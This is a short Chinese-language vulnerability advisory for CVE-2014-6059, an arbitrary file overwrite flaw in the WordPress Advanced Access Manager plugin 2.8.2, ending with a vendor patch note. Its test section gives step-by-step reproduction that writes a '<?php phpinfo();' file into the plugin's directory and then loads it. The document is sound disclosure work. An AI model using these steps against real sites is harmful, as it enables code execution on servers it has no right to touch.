WordPress Advanced Access Manager插件任意文件覆盖漏洞(CVE-

发布日期:2014-09-03
更新日期:2014-09-04

受影响系统:
WordPress Advanced Access Manager 2.8.2
 WordPress Advanced Access Manager
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 69549
 CVE(CAN) ID: CVE-2014-6059

 Advanced Access Manager插件是访问控制和安全增强工具,可对单个博客或多站点网络进行灵活的控制。

Advanced Access Manager 2.8.2及其他版本允许对任意文件写入任意内容,根据服务器配置,这有可能导致任意代码执行、覆盖核心文件或者上传目录内的文件。

<*来源:Tom Adams
  *>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Visit http://localhost/wp-admin/admin.php?page=aam-configpress
 Press “Save” (this creates the “aam_configpress” option)
 Visit http://localhost/wp-admin/options.php
 Set “aam_configpress” to “test.php”
Press “Save Changes”
Visit http://localhost/wp-admin/admin.php?page=aam-configpress again
 Enter “<?php phpinfo();” into the textarea (without the quotes)
 Press “Save”
Visit http://localhost/wp-content/aam/test.php

建议:
--------------------------------------------------------------------------------
厂商补丁:

WordPress
 ---------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

https://wordpress.org/plugins/advanced-access-manager/

相关推荐